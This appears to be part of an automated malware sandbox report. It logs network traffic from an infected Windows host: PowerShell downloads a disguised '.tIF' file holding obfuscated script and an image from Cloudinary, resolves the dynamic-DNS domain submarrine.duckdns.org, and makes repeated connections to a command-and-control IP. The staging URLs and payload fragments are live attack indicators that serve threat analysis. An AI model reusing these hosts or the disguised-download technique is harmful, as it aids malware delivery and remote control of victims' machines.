                                                                                          Dec 17, 2024 09:48:07.482518911 CET497236946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:07.602276087 CET694649723192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:08.797920942 CET497246946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:08.917763948 CET694649724192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:08.917905092 CET497246946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:08.921366930 CET497246946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:09.041114092 CET694649724192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:19.407618046 CET694649724192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:19.407973051 CET497246946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:19.408005953 CET497246946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:19.529603004 CET694649724192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:20.424365997 CET497256946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:20.544157028 CET694649725192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:20.544248104 CET497256946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:20.548151970 CET497256946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:20.667870045 CET694649725192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:30.903846979 CET694649725192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:30.903939962 CET497256946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:30.904031992 CET497256946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:31.023776054 CET694649725192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:31.909360886 CET497266946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:32.029364109 CET694649726192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:32.029455900 CET497266946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:32.033874989 CET497266946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:32.153685093 CET694649726192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:42.366523981 CET694649726192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:42.366700888 CET497266946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:42.366766930 CET497266946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:42.486665964 CET694649726192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:43.377734900 CET497276946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:43.497605085 CET694649727192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:43.498574018 CET497276946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:43.502065897 CET497276946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:43.621836901 CET694649727192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:53.785578012 CET694649727192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:53.785689116 CET497276946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:53.785727978 CET497276946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:53.905574083 CET694649727192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:54.799320936 CET497286946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:54.919341087 CET694649728192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:48:54.919480085 CET497286946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:54.922904015 CET497286946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:48:55.042958021 CET694649728192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:49:05.353132963 CET694649728192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:49:05.353257895 CET497286946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:49:05.353296041 CET497286946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:49:05.473259926 CET694649728192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:49:06.362036943 CET497296946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:49:06.482044935 CET694649729192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:49:06.483552933 CET497296946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:49:06.499167919 CET497296946192.168.2.8192.169.69.26
                                                                                          Dec 17, 2024 09:49:06.619054079 CET694649729192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:49:16.744954109 CET694649729192.169.69.26192.168.2.8
                                                                                          Dec 17, 2024 09:49:16.745037079 CET497296946192.168.2.8192.169.69.26
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 17, 2024 09:45:20.635533094 CET6469553192.168.2.81.1.1.1
                                                                                          Dec 17, 2024 09:45:20.773905993 CET53646951.1.1.1192.168.2.8
                                                                                          Dec 17, 2024 09:45:44.692399025 CET6202953192.168.2.81.1.1.1
                                                                                          Dec 17, 2024 09:45:45.131452084 CET53620291.1.1.1192.168.2.8
                                                                                          Dec 17, 2024 09:45:48.837393045 CET5959053192.168.2.81.1.1.1
                                                                                          Dec 17, 2024 09:45:49.168551922 CET53595901.1.1.1192.168.2.8
                                                                                          Dec 17, 2024 09:46:58.362394094 CET6190353192.168.2.81.1.1.1
                                                                                          Dec 17, 2024 09:46:58.711477995 CET53619031.1.1.1192.168.2.8
                                                                                          Dec 17, 2024 09:48:08.486620903 CET6209253192.168.2.81.1.1.1
                                                                                          Dec 17, 2024 09:48:08.797071934 CET53620921.1.1.1192.168.2.8
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 17, 2024 09:45:20.635533094 CET192.168.2.81.1.1.10x695aStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:44.692399025 CET192.168.2.81.1.1.10x88d7Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:48.837393045 CET192.168.2.81.1.1.10xac2Standard query (0)submarrine.duckdns.orgA (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:46:58.362394094 CET192.168.2.81.1.1.10x6b09Standard query (0)submarrine.duckdns.orgA (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:48:08.486620903 CET192.168.2.81.1.1.10xddbStandard query (0)submarrine.duckdns.orgA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 17, 2024 09:45:20.773905993 CET1.1.1.1192.168.2.80x695aNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:20.773905993 CET1.1.1.1192.168.2.80x695aNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:20.773905993 CET1.1.1.1192.168.2.80x695aNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:20.773905993 CET1.1.1.1192.168.2.80x695aNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:20.773905993 CET1.1.1.1192.168.2.80x695aNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:45.131452084 CET1.1.1.1192.168.2.80x88d7No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:45.131452084 CET1.1.1.1192.168.2.80x88d7No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:49.168551922 CET1.1.1.1192.168.2.80xac2No error (0)submarrine.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:46:58.711477995 CET1.1.1.1192.168.2.80x6b09No error (0)submarrine.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:48:08.797071934 CET1.1.1.1192.168.2.80xddbNo error (0)submarrine.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                          • res.cloudinary.com
                                                                                          • paste.ee
                                                                                          • 23.95.235.29
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.84970623.95.235.29807884C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 17, 2024 09:45:14.311207056 CET329OUTGET /118/freesizedressfornaturalbeautyinthiscaseforyougood.tIF HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                          Host: 23.95.235.29
                                                                                          Connection: Keep-Alive
                                                                                          Dec 17, 2024 09:45:15.419286966 CET1236INHTTP/1.1 200 OK
                                                                                          Date: Tue, 17 Dec 2024 08:45:15 GMT
                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                          Last-Modified: Fri, 13 Dec 2024 04:59:49 GMT
                                                                                          ETag: "25996-6291fb3509830"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 154006
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: image/tiff
                                                                                          Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 42 00 5a 00 69 00 57 00 4b 00 65 00 6c 00 4c 00 71 00 4c 00 62 00 4c 00 71 00 61 00 50 00 20 00 3d 00 20 00 22 00 41 00 50 00 4e 00 43 00 42 00 6b 00 78 00 47 00 57 00 61 00 63 00 68 00 57 00 6e 00 4c 00 22 00 0d 00 0a 00 74 00 62 00 69 00 62 00 6d 00 61 00 6a 00 71 00 69 00 43 00 63 00 66 00 50 00 57 00 57 00 20 00 3d 00 20 00 22 00 48 00 68 00 64 00 57 00 63 00 43 00 57 00 76 00 57 00 6d 00 4c 00 4e 00 72 00 63 00 57 00 22 00 0d 00 0a 00 66 00 6c 00 42 00 4c 00 57 00 70 00 4b 00 6f 00 48 00 63 00 55 00 69 00 4c 00 4c 00 43 00 20 00 3d 00 20 00 22 00 4c 00 57 00 72 00 7a 00 5a 00 41 00 7a 00 69 00 57 00 57 00 52 00 4c 00 52 00 6c 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 66 00 66 00 63 00 65 00 4c 00 51 00 5a 00 7a 00 6d 00 57 00 66 00 71 00 50 00 4c 00 69 00 20 00 3d 00 20 00 22 00 6b 00 4e 00 5a 00 48 00 5a 00 74 00 57 00 63 00 47 00 70 00 5a 00 48 00 54 00 78 00 4a 00 22 00 0d 00 0a 00 63 00 66 00 47 00 4b 00 68 00 5a 00 43 00 65 00 4c 00 68 00 [TRUNCATED]
                                                                                          Data Ascii: BZiWKelLqLbLqaP = "APNCBkxGWachWnL"tbibmajqiCcfPWW = "HhdWcCWvWmLNrcW"flBLWpKoHcUiLLC = "LWrzZAziWWRLRlL"ffceLQZzmWfqPLi = "kNZHZtWcGpZHTxJ"cfGKhZCeLhmZoKu = "WQuQvLLQlWpcdPB"OWaeHNJczvKaLOK = "plnhIPRjOaHnfbo"eAtHKnAKUSOWPiW = "iuGPBnqcGlWcBLp"vcBNZdnLApickjU = "KUhLKcKjKuilqrL"POzUzoGIKLiGlnc = "ezpaofhlKLcZPWW"ILUlbzWZcKWmkeb = "WAkaLcWHzUpbiuv"AcipZlLigeKceUn = "RGRToouUitRZplU"WzWNkTLoZpmrWoW = "ofKcxqCliSjeNAL"GlzZul
                                                                                          Dec 17, 2024 09:45:15.419357061 CET1236INData Raw: 00 4c 00 54 00 6b 00 69 00 74 00 69 00 47 00 41 00 51 00 20 00 3d 00 20 00 22 00 57 00 70 00 55 00 55 00 66 00 69 00 63 00 64 00 66 00 6c 00 6b 00 57 00 57 00 7a 00 69 00 22 00 0d 00 0a 00 4b 00 6e 00 4b 00 70 00 54 00 4c 00 66 00 5a 00 57 00 6d
                                                                                          Data Ascii: LTkitiGAQ = "WpUUficdflkWWzi"KnKpTLfZWmaeUiz = "KLoOLqKfiLoZkZi"iaioWxccALLeqIL = "gGLPbRWGOoLzczK"RGPkukGoibkaKB
                                                                                          Dec 17, 2024 09:45:15.419375896 CET1236INData Raw: 00 69 00 42 00 4c 00 55 00 4f 00 69 00 22 00 0d 00 0a 00 62 00 6b 00 49 00 5a 00 4c 00 42 00 55 00 6d 00 4c 00 7a 00 70 00 6e 00 71 00 5a 00 6d 00 20 00 3d 00 20 00 22 00 50 00 4c 00 66 00 70 00 4e 00 57 00 49 00 6c 00 70 00 62 00 6d 00 41 00 57
                                                                                          Data Ascii: iBLUOi"bkIZLBUmLzpnqZm = "PLfpNWIlpbmAWKR"oAtASBchLNGAiim = "hStkvnGGrmUmndo"kbWRLpWTpqeIegt = "BNLcWWWKiWqZZLk"h
                                                                                          Dec 17, 2024 09:45:15.419480085 CET1236INData Raw: 00 75 00 57 00 20 00 3d 00 20 00 22 00 4b 00 4a 00 63 00 66 00 4b 00 47 00 63 00 4c 00 63 00 48 00 47 00 63 00 64 00 57 00 57 00 22 00 0d 00 0a 00 68 00 42 00 6d 00 62 00 65 00 4b 00 66 00 78 00 57 00 65 00 57 00 4c 00 7a 00 41 00 70 00 20 00 3d
                                                                                          Data Ascii: uW = "KJcfKGcLcHGcdWW"hBmbeKfxWeWLzAp = "NqqlLGuKizOzKfi"nUmRWWfeZiGmiah = "PkpkgKaUtuTKSnc"izqrsccbUkeLLpe = "KcLL
                                                                                          Dec 17, 2024 09:45:15.419517040 CET1236INData Raw: 00 57 00 49 00 57 00 4e 00 6d 00 4c 00 47 00 65 00 4c 00 42 00 57 00 53 00 61 00 7a 00 55 00 20 00 3d 00 20 00 22 00 6f 00 65 00 41 00 6e 00 4e 00 63 00 7a 00 7a 00 57 00 68 00 57 00 4c 00 4e 00 47 00 6d 00 22 00 0d 00 0a 00 70 00 4e 00 4f 00 6e
                                                                                          Data Ascii: WIWNmLGeLBWSazU = "oeAnNczzWhWLNGm"pNOnKcknpGBzLRB = "qBLborWJcPvPbCg"olCKRnULCibchUO = "UzeNTKZGKLZaKqk"QUnWIfcI
                                                                                          Dec 17, 2024 09:45:15.419533014 CET1236INData Raw: 00 55 00 4f 00 4e 00 65 00 6b 00 78 00 63 00 57 00 50 00 5a 00 6e 00 57 00 22 00 0d 00 0a 00 69 00 4f 00 71 00 4c 00 62 00 4c 00 74 00 63 00 62 00 75 00 6e 00 55 00 69 00 63 00 70 00 20 00 3d 00 20 00 22 00 43 00 75 00 63 00 70 00 6c 00 4b 00 75
                                                                                          Data Ascii: UONekxcWPZnW"iOqLbLtcbunUicp = "CucplKukoLkOiek"LAOHZJGfWmcsuqT = "LmkCLbusjNHzLWp"WIKkzklWqLKKxRL = "KLOeQmWzzZLLZ
                                                                                          Dec 17, 2024 09:45:15.419548988 CET776INData Raw: 00 7a 00 62 00 4e 00 62 00 6b 00 42 00 62 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 41 00 43 00 6f 00 4c 00 66 00 74 00 57 00 78 00 57 00 70 00 62 00 6e 00 71 00 55 00 22 00 0d 00 0a 00 42 00 61 00 7a 00 63 00 6f 00 4c 00 4c 00 43 00 76 00 4e 00 47
                                                                                          Data Ascii: zbNbkBbL = "KACoLftWxWpbnqU"BazcoLLCvNGPCoc = "LCKLjRzpGWWGpKi"fNGcKgotQicAGhG = "fOmBWkWelUtLkZR"gRrGoLhZpZRzffz =
                                                                                          Dec 17, 2024 09:45:15.419565916 CET1236INData Raw: 00 5a 00 4e 00 57 00 4e 00 70 00 6c 00 53 00 74 00 42 00 61 00 47 00 22 00 0d 00 0a 00 47 00 4c 00 41 00 78 00 48 00 42 00 57 00 50 00 62 00 4a 00 68 00 42 00 63 00 75 00 55 00 20 00 3d 00 20 00 22 00 54 00 7a 00 61 00 6d 00 4f 00 66 00 64 00 43
                                                                                          Data Ascii: ZNWNplStBaG"GLAxHBWPbJhBcuU = "TzamOfdCLLifuGA"JhSfSclpspLezoA = "oZPczCjGelhGtnp"HLGhLtoRmLklmfk = "jiPoCuLUdzWbtB
                                                                                          Dec 17, 2024 09:45:15.419688940 CET1236INData Raw: 00 4b 00 72 00 4c 00 41 00 4b 00 20 00 3d 00 20 00 22 00 6f 00 67 00 6b 00 63 00 6c 00 50 00 6f 00 43 00 5a 00 5a 00 4a 00 4e 00 42 00 4f 00 41 00 22 00 0d 00 0a 00 57 00 47 00 57 00 55 00 61 00 70 00 4c 00 4c 00 4c 00 4b 00 63 00 57 00 50 00 78
                                                                                          Data Ascii: KrLAK = "ogkclPoCZZJNBOA"WGWUapLLLKcWPxi = "LdeHZlGbWGWWkpi"epioUcWRPUHLeIW = "hRdUHKihAAHlZGW"RczWfKiLWAdKKHG =
                                                                                          Dec 17, 2024 09:45:15.419713020 CET1236INData Raw: 00 4c 00 57 00 22 00 0d 00 0a 00 68 00 6f 00 43 00 53 00 68 00 66 00 4c 00 49 00 4c 00 49 00 65 00 65 00 69 00 4b 00 52 00 20 00 3d 00 20 00 22 00 65 00 4f 00 66 00 63 00 63 00 4b 00 69 00 63 00 7a 00 76 00 57 00 63 00 4b 00 55 00 74 00 22 00 0d
                                                                                          Data Ascii: LW"hoCShfLILIeeiKR = "eOfccKiczvWcKUt"bcLcifLCCcxocAL = "zLtKJLLKPLxKGLk"PmKcmNZGxkiPiAC = "iNWcxGbWUijLjfL"AigbN
                                                                                          Dec 17, 2024 09:45:15.539269924 CET1236INData Raw: 00 20 00 22 00 61 00 7a 00 55 00 5a 00 6e 00 72 00 78 00 41 00 69 00 6d 00 41 00 55 00 6d 00 6c 00 69 00 22 00 0d 00 0a 00 55 00 70 00 57 00 53 00 43 00 42 00 71 00 66 00 62 00 69 00 6d 00 4e 00 52 00 4b 00 41 00 20 00 3d 00 20 00 22 00 53 00 69
                                                                                          Data Ascii: "azUZnrxAimAUmli"UpWSCBqfbimNRKA = "SiLaAmWzGlshcgN"pcbIhPJqJcJczbx = "GPkWKbWWmcLxiNp"ueUGeKOejPnkfhW = "BPRzKmee


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.849707151.101.193.1374438184C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-17 08:45:22 UTC127OUTGET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1
                                                                                          Host: res.cloudinary.com
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-17 08:45:22 UTC834INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          Content-Length: 2469849
                                                                                          Content-Type: image/jpeg
                                                                                          Etag: "78bd258abedd7787714b5d9c33eb9212"
                                                                                          Last-Modified: Fri, 13 Dec 2024 00:49:52 GMT
                                                                                          Date: Tue, 17 Dec 2024 08:45:22 GMT
                                                                                          Strict-Transport-Security: max-age=604800
                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                          Server-Timing: cld-fastly;dur=194;cpu=40;start=2024-12-17T08:45:22.322Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2469849,format=\"jpg\",o=1,crt=1734050991,ef=(17)",cloudinary;dur=144;start=2024-12-17T08:45:22.367Z
                                                                                          Server: Cloudinary
                                                                                          Timing-Allow-Origin: *
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Accept-Ranges: bytes
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                          x-request-id: fdecdd9b808625f2ef998baba5084d1b
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                          Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                          Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                          Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                          Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                          Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
